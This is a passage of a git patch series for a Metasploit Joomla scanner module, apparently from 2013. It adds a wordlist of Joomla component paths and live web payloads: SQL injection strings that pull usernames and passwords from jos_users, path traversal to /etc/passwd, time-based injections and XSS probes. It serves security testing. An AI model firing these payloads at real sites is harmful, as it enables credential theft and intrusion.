/\(\'form-login\'\)\.submit/ or res.body =~/administration console/) + sout = "Administrator Login Page" + elsif(res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/) + sout = "Registration Page" + else + sout = iapp + end + return if not sout + if(sout == iapp) + print_good("#{iapp}") + elsif print_good("#{sout}: #{iapp} ") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'Joomla Pages', + :data => sout + ) + end + elsif(res.code.to_i == 403 and datastore['VERBOSE']) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + print_status("#{ip} denied access to #{url} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + print_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + print_status("#{ip} requires a SSL client certificate") + else + print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + end + end + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE + end + def plugin_search(tpath,papp, ip, bres) + res = send_request_cgi({ + 'uri' => tpath+papp, + 'method' => 'GET', + }, 5) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + osize = bres.body.size + nsize = res.body.size + if (res.code.to_i == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) + print_good("Found Plugin: #{papp} ") + if (papp =~/passwd/ and res.body !~/root/) + print_error("\tPasswd not found") + elsif(papp =~/passwd/ and res.body =~/root/) + print_good("\tPasswd file found in response") + elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/) + print_good("\tPossible SQL Injection") + elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/) + print_error("\tUnable to identify SQL injection") + elsif(papp =~/>alert/ and res.body !~/>alert/) + print_error("\tNo XSS") + elsif(papp =~/>alert/ and res.body =~/>alert/) + print_good("\tPossible XSS") + elsif(res.body =~/SQL syntax/ ) + print_error("\tPossible SQL Injection") + elsif(papp =~/com_/) + blah = papp.split('_') + blah1 = blah[1].gsub('/','') + res1 = send_request_cgi({ + 'uri' => tpath+"index.php?option=com_#{blah1}", + 'method' => 'GET', + }, 5) + if (res1.code.to_i == 200) + print_status("\tFound_page: index.php?option=com_#{blah1}") + end + end + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'Plugin Found', + :data => papp + ) + elsif(res.code.to_i == 403 and datastore['VERBOSE']) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + print_status("#{ip} denied access to #{url} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + print_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + print_status("#{ip} requires a SSL client certificate") + else + print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + end + end + + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE + end + + + +end From 5cfe58e8d508d2889deb808c9e0c9c3f2c4a4a75 Mon Sep 17 00:00:00 2001 From: f8lerror Date: Sun, 20 Jan 2013 22:33:04 -0500 Subject: [PATCH 2/7] General code review and corrections --- .../auxiliary/scanner/http/joomla_vulnscan.rb | 81 ++++++++++--------- 1 file changed, 43 insertions(+), 38 deletions(-) diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index c8cbfbae27..37bfc3d173 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -20,9 +20,8 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Joomla Scanner', - 'Version' => '$Revision: 14774 $', 'Description' => %q{ - This module scans the Joomla install for information and potential vulnerabilites. + This module scans a Joomla install for information and potential vulnerabilites. }, 'Author' => [ 'f8lerror' ], 'License' => MSF_LICENSE @@ -40,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary ], self.class) end - def osfingerprint(response) + def osfingerprint (response) if(response.headers.has_key?('Server') ) if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) os = "Windows" @@ -51,8 +50,9 @@ class Metasploit3 < Msf::Auxiliary end end return os - end - def fingerprint(response, app) + end + + def fingerprint (response, app) if(response.body =~ /(.+)<\/version\/?>/i) v = $1 @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary return out end - def run_host(ip) + def run_host (ip) tpath = datastore['PATH'] if tpath[-1,1] != '/' tpath += '/' @@ -102,12 +102,12 @@ class Metasploit3 < Msf::Auxiliary apps.each do |app| break if check_app(tpath,app,ip) end - print_status("Scanning for interesting pages") + print_status("Scanning #{ip} for interesting pages") iapps.each do |iapp| scan_pages(tpath,iapp,ip) end if datastore['ENUMERATE'] - print_status("Scanning for plugins") + print_status("Scanning #{ip} for plugins") bres = send_request_cgi({ 'uri' => tpath, 'method' => 'GET', @@ -118,12 +118,13 @@ class Metasploit3 < Msf::Auxiliary papp = bapp.chomp plugin_search(tpath,papp,ip,bres) end - end - end - def check_app(tpath, app, ip) + + end + + def check_app (tpath, app, ip) res = send_request_cgi({ - 'uri' => tpath+app, + 'uri' => "#{datastore['PATH']}" << app, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code @@ -159,13 +160,14 @@ class Metasploit3 < Msf::Auxiliary end end - rescue OpenSSL::SSL::SSLError - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - rescue ::Timeout::Error, ::Errno::EPIPE + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE end - def scan_pages(tpath,iapp, ip) + + def scan_pages (tpath, iapp, ip) res = send_request_cgi({ - 'uri' => tpath+iapp, + 'uri' => "#{datastore['PATH']}" << iapp, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code @@ -201,13 +203,14 @@ class Metasploit3 < Msf::Auxiliary print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") end end - rescue OpenSSL::SSL::SSLError - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - rescue ::Timeout::Error, ::Errno::EPIPE + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE end - def plugin_search(tpath,papp, ip, bres) + + def plugin_search (tpath, papp, ip, bres) res = send_request_cgi({ - 'uri' => tpath+papp, + 'uri' => "#{datastore['PATH']}" << papp, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code @@ -217,30 +220,32 @@ class Metasploit3 < Msf::Auxiliary if (res.code.to_i == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) print_good("Found Plugin: #{papp} ") if (papp =~/passwd/ and res.body !~/root/) - print_error("\tPasswd not found") + print_error("Passwd not found") elsif(papp =~/passwd/ and res.body =~/root/) - print_good("\tPasswd file found in response") + print_good("Passwd file found in response") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/) - print_good("\tPossible SQL Injection") + print_good("Possible SQL Injection") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/) - print_error("\tUnable to identify SQL injection") + print_error("Unable to identify SQL injection") elsif(papp =~/>alert/ and res.body !~/>alert/) - print_error("\tNo XSS") + print_error("No XSS") elsif(papp =~/>alert/ and res.body =~/>alert/) - print_good("\tPossible XSS") + print_good("Possible XSS") elsif(res.body =~/SQL syntax/ ) - print_error("\tPossible SQL Injection") + print_good("Possible SQL Injection") elsif(papp =~/com_/) - blah = papp.split('_') - blah1 = blah[1].gsub('/','') + vars = papp.split('_') + pages = vars[1].gsub('/','') res1 = send_request_cgi({ - 'uri' => tpath+"index.php?option=com_#{blah1}", + 'uri' => "#{datastore['PATH']}"<<"index.php?option=com_#{pages}", 'method' => 'GET', }, 5) if (res1.code.to_i == 200) - print_status("\tFound_page: index.php?option=com_#{blah1}") - end + print_good("Found Page: index.php?option=com_#{pages}") + else + print_error("#{datastore['PATH']}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") end + end report_note( :host => ip, :port => datastore['RPORT'], @@ -257,12 +262,12 @@ class Metasploit3 < Msf::Auxiliary print_status("#{ip} requires a SSL client certificate") else print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") - end end + end - rescue OpenSSL::SSL::SSLError - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - rescue ::Timeout::Error, ::Errno::EPIPE + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE end From 6e94c04a52bc2f90557bffe332abaeb7030051f2 Mon Sep 17 00:00:00 2001 From: f8lerror Date: Wed, 23 Jan 2013 20:26:23 -0500 Subject: [PATCH 3/7] Code Corrections and Enhancements --- data/wordlists/joomla.txt | 627 ++++++++++++++++++ .../auxiliary/scanner/http/joomla_vulnscan.rb | 160 +++-- 2 files changed, 719 insertions(+), 68 deletions(-) create mode 100755 data/wordlists/joomla.txt diff --git a/data/wordlists/joomla.txt b/data/wordlists/joomla.txt new file mode 100755 index 0000000000..b1e651d504 --- /dev/null +++ b/data/wordlists/joomla.txt @@ -0,0 +1,627 @@ +&controller=../../../../../../../../../../../../[LFI]%00 +?1.5.10-x +?1.5.11-x-http_ref +?1.5.11-x-php-s3lf +?1.5.3-path-disclose +?1.5.3-spam +?1.5.8-x +?1.5.9-x +?j1012-fixate-session +?option=com_mysms&Itemid=0&task=phonebook +Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png +admin/ +administrator/ +administrator/components/ +administrator/components/com_a6mambocredits/ +administrator/components/com_a6mambohelpdesk/ +administrator/components/com_admin/admin.admin.html.php +administrator/components/com_astatspro/refer.php +administrator/components/com_bayesiannaivefilter/ +administrator/components/com_chronocontact/excelwriter/PPS/File.php +administrator/components/com_colophon/ +administrator/components/com_colorlab/ +administrator/components/com_comprofiler/ +administrator/components/com_comprofiler/plugin.class.php +administrator/components/com_cropimage/admin.cropcanvas.php +administrator/components/com_extplorer/ +administrator/components/com_feederator/includes/tmsp/add_tmsp.php +administrator/components/com_googlebase/ +administrator/components/com_installer +administrator/components/com_jcs/ +administrator/components/com_jim/ +administrator/components/com_jjgallery/ +administrator/components/com_joom12pic/ +administrator/components/com_joomla-visites/ +administrator/components/com_joomla_flash_uploader/ +administrator/components/com_joomlaflashfun/ +administrator/components/com_joomlaradiov5/ +administrator/components/com_jpack/ +administrator/components/com_jreactions/ +administrator/components/com_juser/ +administrator/components/com_admin/ +administrator/components/com_kochsuite / +administrator/components/com_linkdirectory/ +administrator/components/com_livechat/getSavedChatRooms.php +administrator/components/com_livechat/xmlhttp.php +administrator/components/com_lurm_constructor/admin.lurm_constructor.php +administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php"); +administrator/components/com_mambelfish/ +administrator/components/com_mgm/ +administrator/components/com_mmp/help.mmp.php +administrator/components/com_mosmedia/ +administrator/components/com_multibanners/extadminmenus.class.php +administrator/components/com_panoramic/ +administrator/components/com_peoplebook/param.peoplebook.php +administrator/components/com_phpshop/toolbar.phpshop.html.php +administrator/components/com_remository/admin.remository.php +administrator/components/com_serverstat/install.serverstat.php +administrator/components/com_simpleswfupload/uploadhandler.php"); +administrator/components/com_swmenupro/ +administrator/components/com_treeg/ +administrator/components/com_uhp/ +administrator/components/com_uhp2/ +administrator/components/com_webring/ +administrator/components/com_wmtgallery/ +administrator/components/com_wmtportfolio/ +administrator/components/com_x-shop/ +administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ +administrator/index.php?option=com_searchlog&act=log +ajaxim/ +akocomments.php +cart?Itemid=[SQLi] +component/com__brightweblinks/ +component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 +component/osproperty/?task=agent_register +component/quran/index.php?option=com_quran&action=viewayat&surano= +components/com_ clickheat/ +components/com_5starhotels/ +components/com_Jambook/jambook.php +components/com_a6mambocredits/ +components/com_a6mambohelpdesk/ +components/com_ab_gallery/ +components/com_acajoom/ +components/com_acctexp/ +components/com_aclassf/ +components/com_activities/ +components/com_actualite/ +components/com_admin/admin.admin.html.php +components/com_advancedpoll/ +components/com_agora/ +components/com_agoragroup/ +components/com_ajaxchat/ +components/com_akobook/ +components/com_akocomment/ +components/com_akogallery +components/com_alberghi/ +components/com_allhotels/ +components/com_alphacontent/ +components/com_altas/ +components/com_amocourse/ +components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php +components/com_articles/ +components/com_artist/ +components/com_artlinks/ +components/com_asortyment/ +components/com_astatspro/ +components/com_awesom/ +components/com_babackup/ +components/com_banners/ +components/com_bayesiannaivefilter/ +components/com_be_it_easypartner/ +components/com_beamospetition/ +components/com_biblestudy/ +components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_blog/ +components/com_bookflip/ +components/com_bookjoomlas/ +components/com_booklibrary/ +components/com_books/ +components/com_bsadv/ +components/com_bsq_sitestats/ +components/com_bsq_sitestats/external/rssfeed.php +components/com_bsqsitestats/ +components/com_calendar/ +components/com_camelcitydb2/ +components/com_candle/ +components/com_casino_blackjack/ +components/com_casino_videopoker/ +components/com_casinobase/ +components/com_catalogproduction/ +components/com_catalogshop/ +components/com_category/ +components/com_cgtestimonial/video.php?url="> +components/com_chronocontact/excelwriter/PPS/File.php +components/com_cinema/ +components/com_clasifier/ +components/com_classifieds/ +components/com_clickheat/ +components/com_cloner/ +components/com_cmimarketplace/ +components/com_cms/ +components/com_colophon/ +components/com_colorlab/ +components/com_competitions/ +components/com_comprofiler/ +components/com_comprofiler/plugin.class.php +components/com_contactinfo/ +components/com_content/ +components/com_cpg/cpg.php +components/com_cropimage/admin.cropcanvas.php +components/com_custompages/ +components/com_cx/ +components/com_d3000/ +components/com_dadamail/ +components/com_dailymessage/ +components/com_datsogallery/ +components/com_dbquery/ +components/com_detail/ +components/com_digistore/ +components/com_directory/ +components/com_djiceshoutbox/ +components/com_doc/ +components/com_downloads/ +components/com_ds-syndicate/ +components/com_dtregister/ +components/com_dv/externals/phpupload/upload.php"); +components/com_easybook/ +components/com_emcomposer/ +components/com_equotes/ +components/com_estateagent/ +components/com_eventing/ +components/com_eventlist/ +components/com_events/ +components/com_ewriting/ +components/com_expose/uploadimg.php +components/com_expshop/ +components/com_extcalendar/ +components/com_extcalendar/cal_popup.php?extmode=view&extid= +components/com_extcalendar/extcalendar.php +components/com_extended_registration/registration_detailed.inc.php +components/com_extplorer/ +components/com_ezine/ +components/com_ezstore/ +components/com_facileforms/ +components/com_fantasytournament/ +components/com_faq/ +components/com_feederator/includes/tmsp/add_tmsp.php +components/com_filebase/ +components/com_filiale/ +components/com_flashfun/ +components/com_flashmagazinedeluxe/ +components/com_flippingbook/ +components/com_flyspray/startdown.php +components/com_fm/fm.install.php +components/com_foevpartners/ +components/com_football/ +components/com_formtool/ +components/com_forum/ +components/com_fq/ +components/com_fundraiser/ +components/com_galeria/ +components/com_galleria/galleria.html.php +components/com_gallery/ +components/com_game/ +components/com_gameq/ +components/com_garyscookbook/ +components/com_genealogy/ +components/com_geoboerse/ +components/com_gigcal/ +components/com_gmaps/ +components/com_googlebase/ +components/com_gsticketsystem/ +components/com_guide/ +components/com_hashcash/server.php +components/com_hbssearch/ +components/com_hello_world/ +components/com_hotproperties/ +components/com_hotproperty/ +components/com_hotspots/ +components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php +components/com_hwdvideoshare/ +components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); +components/com_ice/ +components/com_idoblog/ +components/com_idvnews/ +components/com_ignitegallery/ +components/com_ijoomla_archive/ +components/com_ijoomla_rss/ +components/com_inter/ +components/com_ionfiles/ +components/com_is/ +components/com_ixxocart/ +components/com_jabode/ +components/com_jashowcase/ +components/com_jb2/ +components/com_jce/ +components/com_jcs/ +components/com_jd-wiki/ +components/com_jd-wp/ +components/com_jim/ +components/com_jjgallery/ +components/com_jmovies/ +components/com_jobline/ +components/com_jombib/ +components/com_joobb/ +components/com_jooget/ +components/com_joom12pic/ +components/com_joomla-visites/ +components/com_joomla_flash_uploader/ +components/com_joomlaboard/ +components/com_joomladate/ +components/com_joomlaflashfun/ +components/com_joomlalib/ +components/com_joomlaradiov5/ +components/com_joomlavvz/ +components/com_joomlaxplorer/ +components/com_joomloads/ +components/com_joomradio/ +components/com_joomtracker/ +components/com_joovideo/ +components/com_jotloader/ +components/com_journal/ +components/com_jpack/ +components/com_jpad/ +components/com_jreactions/ +components/com_jreviews/scripts/xajax.inc.php +components/com_jumi/ +components/com_juser/ +components/com_jvideo/ +components/com_k2/ +components/com_kbase/ +components/com_knowledgebase/fckeditor/fckeditor.js +components/com_kochsuite / +components/com_kunena/ +components/com_letterman/ +components/com_lexikon/ +components/com_linkdirectory/ +components/com_listoffreeads/ +components/com_livechat/getSavedChatRooms.php +components/com_livechat/xmlhttp.php +components/com_liveticker/ +components/com_lm/ +components/com_lmo/ +components/com_loudmounth/includes/abbc/abbc.class.php +components/com_loudmouth/ +components/com_lowcosthotels/ +components/com_lurm_constructor/admin.lurm_constructor.php +components/com_mad4joomla/ +components/com_madeira/img.php +components/com_maianmusic/ +components/com_mailarchive/ +components/com_mailto/ +components/com_mambatstaff/mambatstaff.php +components/com_mambelfish/ +components/com_mambospgm/ +components/com_mambowiki/MamboLogin.php +components/com_marketplace/ +components/com_mcquiz/ +components/com_mdigg/ +components/com_media_library/ +components/com_mediaslide/ +components/com_mezun/ +components/com_mgm/ +components/com_minibb/ +components/com_misterestate/ +components/com_mmp/help.mmp.php +components/com_model/ +components/com_moodle/moodle.php +components/com_moofaq/ +components/com_mosmedia/ +components/com_mospray/scripts/admin.php +components/com_mosres/ +components/com_most/ +components/com_mp3_allopass/ +components/com_mtree/ +components/com_mtree/img/listings/o/{id}.php +components/com_multibanners/extadminmenus.class.php +components/com_myalbum/ +components/com_mycontent/ +components/com_mydyngallery/ +components/com_mygallery/ +components/com_n-forms/ +components/com_na_content/ +components/com_na_mydocs/ +components/com_na_newsdescription/ +components/com_na_qforms/ +components/com_neogallery/ +components/com_neorecruit/ +components/com_neoreferences/ +components/com_netinvoice/ +components/com_news/ +components/com_news_portal/ +components/com_newsflash/ +components/com_nfn_addressbook/ +components/com_nicetalk/ +components/com_noticias/ +components/com_omnirealestate/ +components/com_omphotogallery/ +components/com_ongumatimesheet20/ +components/com_onlineflashquiz/ +components/com_ownbiblio/ +components/com_panoramic/ +components/com_paxgallery/ +components/com_paxxgallery/ +components/com_pcchess/ +components/com_pcchess/include.pcchess.php +components/com_pccookbook/ +components/com_pccookbook/pccookbook.php +components/com_peoplebook/param.peoplebook.php +components/com_performs/ +components/com_philaform/ +components/com_phocadocumentation/ +components/com_php/ +components/com_phpshop/toolbar.phpshop.html.php +components/com_pinboard/ +components/com_pms/ +components/com_poll/ +components/com_pollxt/ +components/com_ponygallery/ +components/com_portafolio/ +components/com_portfol/ +components/com_prayercenter/ +components/com_pro_desk/ +components/com_prod/ +components/com_productshowcase/ +components/com_profiler/ +components/com_projectfork/ +components/com_propertylab/ +components/com_puarcade/ +components/com_publication/ +components/com_quiz/ +components/com_rapidrecipe/ +components/com_rdautos/ +components/com_realestatemanager/ +components/com_recly/ +components/com_referenzen/ +components/com_rekry/ +components/com_remository/admin.remository.php +components/com_remository_files/file_image_14/1276100016shell.php +components/com_reporter/processor/reporter.sql.php +components/com_resman/ +components/com_restaurante/ +components/com_ricette/ +components/com_rsfiles/ +components/com_rsgallery/ +components/com_rsgallery2/ +components/com_rss/ +components/com_rssreader/ +components/com_rssxt/ +components/com_rwcards/ +components/com_school/ +components/com_search/ +components/com_sebercart/getPic.php?p=[LFD]%00 +components/com_securityimages/ +components/com_sef/ +components/com_seminar/ +components/com_serverstat/install.serverstat.php +components/com_sg/ +components/com_simple_review/ +components/com_simpleboard/ +components/com_simplefaq/ +components/com_simpleshop/ +components/com_sitemap/sitemap.xml.php +components/com_slideshow/ +components/com_smf/ +components/com_smf/smf.php +components/com_swmenupro/ +components/com_team/ +components/com_tech_article/ +components/com_thopper/ +components/com_thyme/ +components/com_tickets/ +components/com_tophotelmodule/ +components/com_tour_toto/ +components/com_trade/ +components/com_uhp/ +components/com_uhp2/ +components/com_user/controller.php +components/com_users/ +components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php +components/com_vehiclemanager/ +components/com_versioning / +components/com_videodb/core/videodb.class.xml.php +components/com_virtuemart/ +components/com_volunteer/ +components/com_vr/ +components/com_waticketsystem/ +components/com_webhosting/ +components/com_weblinks/ +components/com_webring/ +components/com_wmtgallery/ +components/com_wmtportfolio/ +components/com_x-shop/ +components/com_xevidmegahd/ +components/com_xewebtv/ +components/com_xfaq/ +components/com_xgallery/helpers/img.php?file= +components/com_xsstream-dm/ +components/com_ynews/ +components/com_yvcomment/ +components/com_zoom/classes/ +components/mod_letterman/ +components/remository/ +eXtplorer/ +easyblog/entry/uncategorized +extplorer/ +components/com_mtree/img/listings/o/{id}.php where {id} +includes/joomla.php +index.php/404' +index.php/?option=com_question&catID=21' and+1=0 union all +index.php/image-gallery/">/25-koala +index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 +index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view +index.php?option=com_aardvertiser&cat_name=conf&task=<= +index.php?option=com_aardvertiser&task= +index.php?option=com_abc&view=abc&letter=AS§ionid=' +index.php?option=com_advert&id=36' +index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- +index.php?option=com_alfurqan15x&action=viewayat&surano= +index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version +index.php?option=com_annonces&view=edit&Itemid=1 +index.php?option=com_articleman&task=new +index.php?option=com_bbs&bid=-1 +index.php?option=com_beamospetition&startpage=3&pet=- +index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users- +index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27 +index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1 +index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-- +index.php?option=com_chronoconnectivity&itemid=1 +index.php?option=com_chronocontact&itemid=1 +index.php?option=com_cinema&Itemid=S@BUN&func=detail&id= +index.php?option=com_clantools&squad=1+ +index.php?option=com_clantools&task=clanwar&showgame=1+ +index.php?option=com_commedia&format=raw&task=image&pid=4&id=964' +index.php?option=com_commedia&task=page&commpid=21 +index.php?option=com_connect&view=connect&controller= +index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../ +index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_dioneformwizard&controller=[LFI]%00 +index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1 +index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 +index.php?option=com_easyfaq&Itemid=1&task=view&gid= +index.php?option=com_easyfaq&catid=1&task=view&id=-2527+ +index.php?option=com_easyfaq&task=view&contact_id= +index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= +index.php?option=com_equipment&task=components&id=45&sec_men_id= +index.php?option=com_equipment&view=details&id= +index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli] +index.php?option=com_etree&view=displays&layout=category&id=[SQL] +index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] +index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 +index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- +index.php?option=com_filecabinet&task=download&cid[]=7 +index.php?option=com_firmy&task=section_show_set&Id=-1 +index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R +index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= +index.php?option=com_graphics&controller= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= +index.php?option=com_huruhelpdesk&view=detail +index.php?option=com_huruhelpdesk&view=detail&cid[0]= +index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 +index.php?option=com_iproperty&view=agentproperties&id= +index.php?option=com_jacomment&view= +index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 +index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_jcommunity&controller=members&task=1' +index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13 +index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2 +index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2 +index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00 +index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_jfuploader&Itemid= +index.php?option=com_jgen&task=view&id= +index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00 +index.php?option=com_jimtawl&Itemid=12&task= +index.php?option=com_jmarket&controller=product&task=1' +index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1' +index.php?option=com_jomdirectory&task=search&type=111+ +index.php?option=com_joomdle&view=detail&cat_id=1&course_id= +index.php?option=com_joomla_flash_uploader&Itemid=1 +index.php?option=com_joomleague&func=showNextMatch&p=[sqli] +index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli] +index.php?option=com_joomtouch&controller= +index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00 +index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00 +index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users +index.php?option=com_jstore&controller=product-display&task=1' +index.php?option=com_jsubscription&controller=subscription&task=1' +index.php?option=com_jtickets&controller=ticket&task=1' +index.php?option=com_konsultasi&act=detail&sid= +index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en +index.php?option=com_kunena&func=userlist&search= +index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' +index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users-- +index.php?option=com_matamko&controller= +index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm +index.php?option=com_neorecruit&task=offer_view&id= +index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- +index.php?option=com_noticeboard&controller= +index.php?option=com_obsuggest&controller= +index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- +index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- +index.php?option=com_oziogallery&Itemid= +index.php?option=com_page&id=53 +index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL))) 